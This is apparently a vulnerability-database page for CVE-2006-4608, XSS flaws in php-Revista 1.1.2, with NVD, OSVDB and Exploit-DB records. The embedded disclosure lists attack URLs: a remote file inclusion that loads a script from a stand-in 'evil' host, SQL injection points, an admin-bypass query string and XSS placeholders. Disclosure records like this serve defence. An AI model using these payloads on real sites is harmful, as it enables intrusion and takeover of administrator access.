Search...

CVE-2006-4608

2006-09-06T20:04:00

ID CVE-2006-4608
Type cve
Reporter NVD
Modified 2017-10-10T21:31:14

Description

Multiple cross-site scripting (XSS) vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cadena parameter in busqueda.php and the (2) email parameter in lista.php.

JSON Vulners Source

Initial Source

{"id": "CVE-2006-4608", "bulletinFamily": "NVD", "title": "CVE-2006-4608", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cadena parameter in busqueda.php and the (2) email parameter in lista.php.", "published": "2006-09-06T20:04:00", "modified": "2017-10-10T21:31:14", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4608", "reporter": "NVD", "references": ["http://securityreason.com/securityalert/1499", "http://www.securityfocus.com/archive/1/archive/1/502637/100/0/threaded", "http://www.attrition.org/pipermail/vim/2009-April/002167.html", "http://www.securityfocus.com/bid/19818", "https://www.exploit-db.com/exploits/8425", "http://www.securityfocus.com/archive/1/archive/1/445007/100/0/threaded"], "cvelist": ["CVE-2006-4608"], "type": "cve", "lastseen": "2017-10-11T11:06:46", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:longino:jacome_php-revista:1.1.2"], "cvelist": ["CVE-2006-4608"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple cross-site scripting (XSS) vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cadena parameter in busqueda.php and the (2) email parameter in lista.php.", "edition": 1, "enchantments": {}, "hash": "1ed576975d55f8cd043d85799ca256173e1ed48caa0b0d7aff208c93b5a7342b", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "67f7e79c36c79708156028e85a848eee", "key": "title"}, {"hash": "caa8b23103c8f2b125e0a1ef7fecd804", "key": "published"}, {"hash": "9746b44bc79c00fc8a58c22392ca8f86", "key": "modified"}, {"hash": "665f54c1fd5caceec877c5902ba38f4f", "key": "description"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "d63a0b552235492d81c2e16a9987508f", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "754b13d2158fdd493b790d1a2d26ba03", "key": "cpe"}, {"hash": "c82ad2bc9029174fea75f62802ca2faf", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "8eae7d30b0d8d692637202994724bce1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4608", "id": "CVE-2006-4608", "lastseen": "2016-09-03T07:30:53", "modified": "2009-04-18T01:06:32", "objectVersion": "1.2", "published": "2006-09-06T20:04:00", "references": ["http://securityreason.com/securityalert/1499", "http://www.milw0rm.com/exploits/8425", "http://www.securityfocus.com/archive/1/archive/1/502637/100/0/threaded", "http://www.attrition.org/pipermail/vim/2009-April/002167.html", "http://www.securityfocus.com/bid/19818", "http://www.securityfocus.com/archive/1/archive/1/445007/100/0/threaded"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-4608", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T07:30:53"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "754b13d2158fdd493b790d1a2d26ba03"}, {"key": "cvelist", "hash": "8eae7d30b0d8d692637202994724bce1"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "665f54c1fd5caceec877c5902ba38f4f"}, {"key": "href", "hash": "d63a0b552235492d81c2e16a9987508f"}, {"key": "modified", "hash": "b5fb4ab879ab7aec171e89054970eb57"}, {"key": "published", "hash": "caa8b23103c8f2b125e0a1ef7fecd804"}, {"key": "references", "hash": "91af11bd26bbb9842f537d934141bde7"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "67f7e79c36c79708156028e85a848eee"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "281a7a8e64ec9f77fb92886baa751182dc001ce16d81bc3b3aa1c8d6e77f4f53", "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2017-10-11T11:06:46"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "cpe": ["cpe:/a:longino:jacome_php-revista:1.1.2"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}

{"osvdb": [{"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Vulnerability Description\nphp-revista contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'cadena' variable upon submission to the 'busqueda.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nphp-revista contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'cadena' variable upon submission to the 'busqueda.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>\n## References:\nVendor URL: http://php-revista.sourceforge.org/\n[Secunia Advisory ID:21738](https://secuniaresearch.flexerasoftware.com/advisories/21738/)\n[Related OSVDB ID: 28443](https://vulners.com/osvdb/OSVDB:28443)\n[Related OSVDB ID: 28445](https://vulners.com/osvdb/OSVDB:28445)\n[Related OSVDB ID: 28448](https://vulners.com/osvdb/OSVDB:28448)\n[Related OSVDB ID: 28446](https://vulners.com/osvdb/OSVDB:28446)\n[Related OSVDB ID: 28449](https://vulners.com/osvdb/OSVDB:28449)\n[Related OSVDB ID: 28451](https://vulners.com/osvdb/OSVDB:28451)\n[Related OSVDB ID: 28452](https://vulners.com/osvdb/OSVDB:28452)\n[Related OSVDB ID: 28447](https://vulners.com/osvdb/OSVDB:28447)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0017.html\n[CVE-2006-4608](https://vulners.com/cve/CVE-2006-4608)\nBugtraq ID: 19818\n", "reporter": "SirDarckCat(sirdarckcat@gmail.com)", "published": "2006-09-01T05:34:21", "type": "osvdb", "title": "php-revista busqueda.php cadena Variable XSS", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "php-revista", "version": "1.1.2", "operator": "eq"}], "cvelist": ["CVE-2006-4608"], "modified": "2006-09-01T05:34:21", "href": "https://vulners.com/osvdb/OSVDB:28450", "id": "OSVDB:28450", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T05:29:57", "osvdbidlist": ["28445", "28446", "28447", "28450", "28449", "28452", "28448", "28451", "28443"], "references": [], "description": "PHP-Revista 1.1.2 (RFI/SQLi/CB/XSS) Multiple Remote Vulnerabilities. CVE-2006-4605,CVE-2006-4606,CVE-2006-4607,CVE-2006-4608. Webapps exploit for php platform", "edition": 1, "reporter": "SirDarckCat", "published": "2009-04-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "php-revista 1.1.2 rfi/sqli/cb/XSS Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4607", "CVE-2006-4608", "CVE-2006-4606", "CVE-2006-4605"], "modified": "2009-04-14T00:00:00", "id": "EDB-ID:8425", "href": "https://www.exploit-db.com/exploits/8425/", "sourceData": "Discovered by Sirdarckcat from elhacker.net\n\n------------------------------------------------------------------------\n------------\n\nRevista 1.1.2\n\nhttp://php-revista.sourceforge.org\n\n------------------------------------------------------------------------\n------------\n\nRevista is a simple spanish PHP magazine editor.\n\nIt was done by php.org.mx\n\nIt suffers of multiple vulnerabilities.\n\n------------------------------------------------------------------------\n------------\n\nRemote File Inclusion\n\nhttp://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script\n\n------------------------------------------------------------------------\n------------\n\nSQLi\n\nhttp://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]\n\nhttp://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]\n\nhttp://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]\n\nhttp://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]\n\nhttp://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]\n\n------------------------------------------------------------------------\n------------\n\nCredentials Bypass\n\nhttp://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1\n\n------------------------------------------------------------------------\n------------\n\nXSS\n\nhttp://revista/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>\n\nhttp://revista/estilo/[ANY STYLE]/lista.php?email=<XSS>\n\n------------------------------------------------------------------------\n\n# milw0rm.com [2009-04-14]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8425/"}]}